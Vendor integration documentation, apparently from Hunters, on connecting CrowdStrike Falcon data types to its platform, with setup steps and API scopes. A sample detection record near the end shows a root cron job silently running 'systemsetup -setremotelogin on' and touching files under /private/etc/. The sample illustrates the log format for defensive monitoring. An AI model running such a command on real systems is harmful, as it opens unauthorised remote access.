Connect this data source on your own, using the Hunters platform.
TL;DR
Supported data types | 3rd party detection | Hunters detection | IOC search | Search | Table name | Log format | Collection method |
---|---|---|---|---|---|---|---|
CrowdStrike Raw Events | ✅ | ✅ | ✅ | crowdstrike_raw_events | NDJSON | CrowdStrike Store | |
CrowdStrike Detections | ✅ | ✅ | crowdstrike_detects | NDJSON | CrowdStrike Store | ||
CrowdStrike Devices | ✅ | ✅ | crowdstrike_devices | NDJSON | CrowdStrike Store | ||
CrowdStrike Incidents | ✅ | crowdstrike_incidents | NDJSON | CrowdStrike Store | |||
CrowdStrike Identity Based Alerts | ✅ | ✅ | crowdstrike_idp | NDJSON | API | ||
CrowdStrike Mobile | ✅ | ✅ | crowdstrike_mobile | NDJSON | API | ||
CrowdStrike Spotlight | ✅ | crowdstrike_spotlight | NDJSON | API | |||
CrowdStrike Indicators | ✅ | crowdstrike_indicators | NDJSON | API | |||
CrowdStrike FileVantage | ✅ | ✅ | crowdstrike_filevantage_queries_changes | NDJSON | API | ||
CrowdStrike Falcon Event Streams | ✅ | ✅ | ✅ | crowdstrike_falcon_event_streams | NDJSON | CrowdStrike Store | |
CrowdStrike Alerts | ✅ | crowdstrike_alerts | NDJSON | API |
Overview
CrowdStrike is a cybersecurity company that provides endpoint security, threat intelligence, and cyber attack response services. Its flagship product, CrowdStrike Falcon, is a cloud-based endpoint protection platform that uses artificial intelligence and machine learning to detect and prevent cyber threats in real-time.
📘 Note
The following modules are needed for data collection:
Detections - requires Insight module.
Spotlight - requires Spotlight module.
Raw telemetry - requires Falcon Data Replicator.
Supported data types
⚠️Attention
If you have several CrowdStrike customer IDs under one parent ID, it is crucial to set up a separate data flow for each customer ID and to avoid using the parent ID when setting up the connection on Hunters.
CrowdStrike Raw Events
Overview
Table name: crowdstrike_raw_events
CrowdStrike raw events represent the detailed data captured by the Falcon sensor installed on each endpoint. These events encompass a wide range of activities.
Send data to Hunters
Step 1: Connect Hunters to your CrowdStrike portal
-
Log into the CrowdStrike Falcon portal.
-
From the left-side menu, click CrowdStrike Store > All Apps.
-
Look for the Hunters.AI tile and click to open it.
-
Click Try it free.
📘 Note-
Your CrowdStrike API token will be shared with Hunters with the following permissions:
- CrowdStrike Falcon raw data replicator
- CrowdStrike Detections API
-
You will receive an automated email from Hunters confirming this action. This is designed for new prospects who have not yet been introduced to Hunters.
-
-
To retrieve your Customer ID, open the Falcon menu and navigate to Host setup and management > Sensor downloads.
-
Copy your Customer ID and paste it into a safe place.
Step 2: Create a data source on Hunters
- Follow this procedure to connect CrowdStrike as a data source.
- Insert the Customer ID value from the previous section and click Apply.
The Customer ID field is case-sensitive.
Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.
CrowdStrike Detections
Overview
Table name: crowdstrike_detects
CrowdStrike detections are generated by analyzing events collected from endpoints across the network. These detections are based on a wide range of indicators and sophisticated analysis techniques, including machine learning, behavioral analysis, and threat intelligence. CrowdStrike's Falcon platform is known for its ability to detect a variety of threats, from malware and ransomware to more subtle indicators of attack (IOAs) and indicators of compromise (IOCs).
Send data to Hunters
Step 1: Connect Hunters to your CrowdStrike portal
-
Log into the CrowdStrike Falcon portal.
-
From the left-side menu, click CrowdStrike Store > All Apps.
-
Look for the Hunters.AI tile and click to open it.
-
Click Try it free.
📘 Note-
Your CrowdStrike API token will be shared with Hunters with the following permissions:
- CrowdStrike Falcon raw data replicator
- CrowdStrike Detections API
-
You will receive an automated email from Hunters confirming this action. This is designed for new prospects who have not yet been introduced to Hunters.
-
-
To retrieve your Customer ID, open the Falcon menu and navigate to Host setup and management > Sensor downloads.
-
Copy your Customer ID and paste it into a safe place.
Step 2: Create a data source on Hunters
- Follow this procedure to connect CrowdStrike as a data source.
- Insert the Customer ID value from the previous section and click Apply.
The Customer ID field is case-sensitive.
Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.
CrowdStrike Devices
Overview
Table name: crowdstrike_devices
CrowdStrike device logs encompass a wide range of data points collected from each endpoint or device within the network. These logs are crucial for monitoring the health and security status of the network, detecting potential threats, and facilitating forensic analysis in the event of a security incident.
Send data to Hunters
Step 1: Connect Hunters to your CrowdStrike portal
-
Log into the CrowdStrike Falcon portal.
-
From the left-side menu, click CrowdStrike Store > All Apps.
-
Look for the Hunters.AI tile and click to open it.
-
Click Try it free.
📘 Note-
Your CrowdStrike API token will be shared with Hunters with the following permissions:
- CrowdStrike Falcon raw data replicator
- CrowdStrike Detections API
-
You will receive an automated email from Hunters confirming this action. This is designed for new prospects who have not yet been introduced to Hunters.
-
-
To retrieve your Customer ID, open the Falcon menu and navigate to Host setup and management > Sensor downloads.
-
Copy your Customer ID and paste it into a safe place.
Step 2: Create a data source on Hunters
- Follow this procedure to connect CrowdStrike as a data source.
- Insert the Customer ID value from the previous section and click Apply.
The Customer ID field is case-sensitive.
Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.
CrowdStrike Incidents
Overview
Table name: crowdstrike_incidents
CrowdStrike Incidents are part of CrowdStrike Falcon's comprehensive suite of endpoint protection capabilities, focusing on identifying, managing, and resolving security threats across an organization's network. When the Falcon platform detects a series of related security events or behaviors that indicate a more significant issue or attack, it aggregates this information into an incident. This approach helps security teams prioritize and respond to the most critical threats more efficiently, ensuring that resources are focused where they are needed most.
Send data to Hunters
Step 1: Connect Hunters to your CrowdStrike portal
-
Log into the CrowdStrike Falcon portal.
-
From the left-side menu, click CrowdStrike Store > All Apps.
-
Look for the Hunters.AI tile and click to open it.
-
Click Try it free.
📘 Note-
Your CrowdStrike API token will be shared with Hunters with the following permissions:
- CrowdStrike Falcon raw data replicator
- CrowdStrike Detections API
-
You will receive an automated email from Hunters confirming this action. This is designed for new prospects who have not yet been introduced to Hunters.
-
-
To retrieve your Customer ID, open the Falcon menu and navigate to Host setup and management > Sensor downloads.
-
Copy your Customer ID and paste it into a safe place.
Step 2: Create a data source on Hunters
- Follow this procedure to connect CrowdStrike as a data source.
- Insert the Customer ID value from the previous section and click Apply.
The Customer ID field is case-sensitive.
Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.
CrowdStrike Identity Based Alerts
Overview
Table name: crowdstrike_idp
CrowdStrike's identity-based alerts are part of its advanced threat detection capabilities, focusing on identifying security threats that specifically target or involve user identities and credentials. These alerts play a critical role in an organization's security posture by helping to prevent unauthorized access, insider threats, and identity-related attacks. With the increasing sophistication of cyber threats, particularly those involving credential theft, social engineering, and lateral movement within networks, identity-based security solutions have become essential.
Send data to Hunters
⚠️ Attention
The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).
Step 1: Create an API client
Create a CrowdStrike API client with the Alerts: Read scope and permissions (as specified here).
Step 2: Create a data source on Hunters
Complete the process on the Hunters platform, and supply the following keys following this process:
- Client ID
- Client Secret
- Cloud Endpoint - This should only contain the domain name, without the
https://
prefix. For example:api.crowdstrike.com
.
CrowdStrike Mobile
Overview
Table name: crowdstrike_mobile
Mobile logs in CrowdStrike encompass detailed records of activities, events, and security incidents on mobile devices that are protected by the CrowdStrike Falcon platform. These logs are crucial for monitoring the security posture of mobile devices, investigating incidents, and ensuring compliance with organizational security policies.
Send data to Hunters
⚠️ Attention
The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).
Step 1: Create an API client
Create a CrowdStrike API client with the Alerts: Read scope and permissions (as specified here).
Step 2: Create a data source on Hunters
Complete the process on the Hunters platform, and supply the following keys following this process:
- Client ID
- Client Secret
- Cloud Endpoint - This should only contain the domain name, without the
https://
prefix. For example:api.crowdstrike.com
.
CrowdStrike Spotlight
Overview
Table name: crowdstrike_spotlight
Spotlight logs contain detailed information about detected vulnerabilities in an organization's endpoints. These logs are essential for tracking, managing, and mitigating vulnerabilities effectively. The data includes specifics about each vulnerability, such as its severity, the affected software or system component, and recommendations for remediation.
Send data to Hunters
⚠️ Attention
The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).
Step 1: Create an API client
Create a CrowdStrike API client with the Vulnerabilities: read scope and permissions (as specified here).
Step 2: Create a data source on Hunters
Complete the process on the Hunters platform, and supply the following keys following this process:
- Client ID
- Client Secret
- Cloud Endpoint - This should only contain the domain name, without the
https://
prefix. For example:api.crowdstrike.com
.
CrowdStrike Indicators
Overview
Table name: crowdstrike_indicators
CrowdStrike utilizes a sophisticated array of indicators within its cybersecurity framework to identify, assess, and respond to threats. These indicators are crucial for detecting malicious activities and are part of CrowdStrike's broader approach to endpoint security and threat intelligence. Understanding these indicators can help organizations better prepare for, and respond to, potential cybersecurity threats.
Send data to Hunters
⚠️ Attention
The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).
Step 1: Create an API client
Create a CrowdStrike API client with the INDICATORS (FALCON INTELLIGENCE): read scope and permissions (as specified here).
Step 2: Create a data source on Hunters
Complete the process on the Hunters platform, and supply the following keys following this process:
- Client ID
- Client Secret
- Cloud Endpoint - This should only contain the domain name, without the
https://
prefix. For example:api.crowdstrike.com
.
CrowdStrike FileVantage
Overview
Table name: crowdstrike_filevantage_queries_changes
FileVantage is designed to track file changes, access patterns, and potential unauthorized data movement, which are critical for data loss prevention (DLP) and insider threat detection. This tool helps organizations manage and secure their sensitive data by leveraging CrowdStrike's powerful endpoint security platform.
Send data to Hunters
⚠️ Attention
The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).
Step 1: Create an API client
Create a CrowdStrike API client with the FILEVANTAGE: read scope and permissions (as specified here).
Step 2: Create a data source on Hunters
Complete the process on the Hunters platform, and supply the following keys following this process:
- Client ID
- Client Secret
- Cloud Endpoint - This should only contain the domain name, without the
https://
prefix. For example:api.crowdstrike.com
.
CrowdStrike Falcon Event Streams
Overview
Table name: crowdstrike_falcon_event_streams
CrowdStrike Falcon Event Streams provide real-time access to rich telemetry data from endpoints protected by the Falcon platform. These event streams allow organizations to monitor and analyze security events, such as process execution, network connections, and file activities, as they happen. By leveraging this data, security teams can build custom integrations, enhance threat detection capabilities, and automate responses to potential threats.
Send data to Hunters
If you already have CrowdStrike connected
On the Hunters platform, navigate to Data > Data sources.
Click + Add data sources to view a list of your connected data sources.
Locate CrowdStrike and click Edit Connection.
Make sure the CROWDSTRIKE API tab is selected.
Scroll down to the Data Types section and activate the CrowdStrike Falcon Event Streams data source.
Now click Test Connection and once the test is successful, click Apply.
If this is your first time connecting CrowdStrike
Step 1: Connect Hunters to your CrowdStrike portal
-
Log into the CrowdStrike Falcon portal.
-
From the left-side menu, click CrowdStrike Store > All Apps.
-
Look for the Hunters.AI tile and click to open it.
-
Click Try it free.
📘 Note-
Your CrowdStrike API token will be shared with Hunters with the following permissions:
- CrowdStrike Falcon raw data replicator
- CrowdStrike Detections API
-
You will receive an automated email from Hunters confirming this action. This is designed for new prospects who have not yet been introduced to Hunters.
-
-
To retrieve your Customer ID, open the Falcon menu and navigate to Host setup and management > Sensor downloads.
-
Copy your Customer ID and paste it into a safe place.
Step 2: Create a data source on Hunters
- Follow this procedure to connect CrowdStrike as a data source.
- Insert the Customer ID value from the previous section and click Apply.
The Customer ID field is case-sensitive.
Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.
Expected format
{
"AgentId": "afwehw34h5a235h23h52",
"AggregateId": "aggind:afwehw34h5a235h23h52:577551784278489191",
"CommandLine": "/usr/sbin/systemsetup -setremotelogin on",
"CompositeId": "a872ad070d984dff884bf211fda3d2d3:ind:afwehw34h5a235h23h52:577551784277851241-41009-3969400",
"DataDomains": "Endpoint",
"Description": "A process triggered an informational severity custom rule.",
"FalconHostLink": "https://falcon.crowdstrike.com/activity-v2/detections/a872ad070d984dff884bf211fda3d2d3:ind:afwehw34h5a235h23h52:577551784277851241-41009-3969400?_cid=afwh35rw3h3hwh3",
"FileName": "systemsetup",
"FilePath": "/usr/sbin/systemsetup",
"FilesAccessed": [
{
"FileName": "systemsetup",
"FilePath": "/usr/sbin/",
"Timestamp": 1727004600
},
{
"FileName": "fawegweg",
"FilePath": "/dev/",
"Timestamp": 1727004600
},
{
"FileName": "pass",
"FilePath": "/private/etc/",
"Timestamp": 1727004600
},
{
"FileName": ".fawefgawaw",
"FilePath": "/private/var/root/",
"Timestamp": 1727004600
},
{
"FileName": "dtracehelper",
"FilePath": "/dev/",
"Timestamp": 1727004600
}
],
"GrandParentCommandLine": "/usr/sbin/cron",
"GrandParentImageFileName": "cron",
"GrandParentImageFilePath": "/usr/sbin/cron",
"HostGroups": "2b5993dc70a249b3956e31e4c936f599,c1d473c1c8d546ea87c35f4c02bdf0b2,e452e9983a9f4939abd3e9612b1480ba",
"Hostname": "ASDHA4356HSWE",
"IOARuleGroupName": "macOS Custom Detections",
"IOARuleInstanceID": "73",
"IOARuleInstanceVersion": 3,
"IOARuleName": "Remote services. Remote login enabled",
"LocalIP": "169.254.254.200",
"LocalIPv6": "",
"LogonDomain": "",
"MACAddress": "aa-bb-cc-dd-ee-df",
"MD5String": "bc91819b3a077dca8ba4054f1c8562ca",
"Name": "Suspicious Activity",
"Objective": "Falcon Detection Method",
"ParentCommandLine": "/bin/sh -c /usr/sbin/systemsetup -setremotelogin on &> /dev/null",
"ParentImageFileName": "bash",
"ParentImageFilePath": "/bin/bash",
"ParentProcessId": 577551784277851239,
"PatternDispositionDescription": "Detection, standard detection.",
"PatternDispositionFlags": {
"BlockingUnsupportedOrDisabled": false,
"BootupSafeguardEnabled": false,
"CriticalProcessDisabled": false,
"Detect": false,
"FsOperationBlocked": false,
"HandleOperationDowngraded": false,
"InddetMask": false,
"Indicator": false,
"KillActionFailed": false,
"KillParent": false,
"KillProcess": false,
"KillSubProcess": false,
"OperationBlocked": false,
"PolicyDisabled": false,
"ProcessBlocked": false,
"QuarantineFile": false,
"QuarantineMachine": false,
"RegistryOperationBlocked": false,
"Rooting": false,
"SensorOnly": false,
"SuspendParent": false,
"SuspendProcess": false
},
"PatternDispositionValue": 0,
"PatternId": 41009,
"ProcessEndTime": 0,
"ProcessId": 577551784277851241,
"ProcessStartTime": 1727004600,
"SHA1String": "0000000000000000000000000000000000000000",
"SHA256String": "0467c233807480601368edac622e93c060ef7b3fcd444c0786956a7f1facb505",
"Severity": 10,
"SeverityName": "Informational",
"SourceProducts": "Falcon Insight",
"SourceVendors": "CrowdStrike",
"Tactic": "Custom Intelligence",
"Technique": "Indicator of Attack",
"Type": "ldt",
"UserName": "root"
}
CrowdStrike Alerts
Overview
Table name: crowdstrike_alerts
The CrowdStrike Alerts API provides programmatic access to security alerts generated by the Falcon platform. It allows users to retrieve, filter, and manage alert data across their environment, enabling seamless integration with SIEMs, SOAR platforms, or custom security workflows. With this API, organizations can automate incident response, monitor real-time threats, and enhance visibility into potential security incidents, all while maintaining tight control over alert data.
Send data to Hunters
⚠️ Attention
The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).
Step 1: Create an API client
Create a CrowdStrike API client with the Alerts: Read scope and permissions (as specified here).
Step 2: Create a data source on Hunters
Complete the process on the Hunters platform, and supply the following keys following this process:
- Client ID
- Client Secret
- Cloud Endpoint - This should only contain the domain name, without the
https://
prefix. For example:api.crowdstrike.com
.